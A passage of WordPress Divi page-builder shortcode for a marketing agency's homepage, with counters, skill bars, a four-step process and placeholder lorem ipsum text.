#ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"50px||3px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" custom_padding_last_edited=\"on|phone\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.1\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||23px||false|false\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||||false|false\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/63368-2.png\" alt=\"Why We\" title_text=\"Best Agency to choose\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"61px|||||\" custom_margin_tablet=\"\" custom_margin_phone=\"0px||||false|false\" custom_margin_last_edited=\"on|phone\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"|auto|2px|auto||\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"0px||50px||false|false\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.1\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>We have a dedicated team to build new tools and technique, to complete the day today repetitive work with precision.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Lead/Sales Generation Campaign - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Digital Advertising - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"4.5.2\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-4.png\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-Copy-12.png\" alt=\"digital advertising\" title_text=\"digital advertising\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just four steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-07-1.png\" title_text=\"home-office-07-1\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration 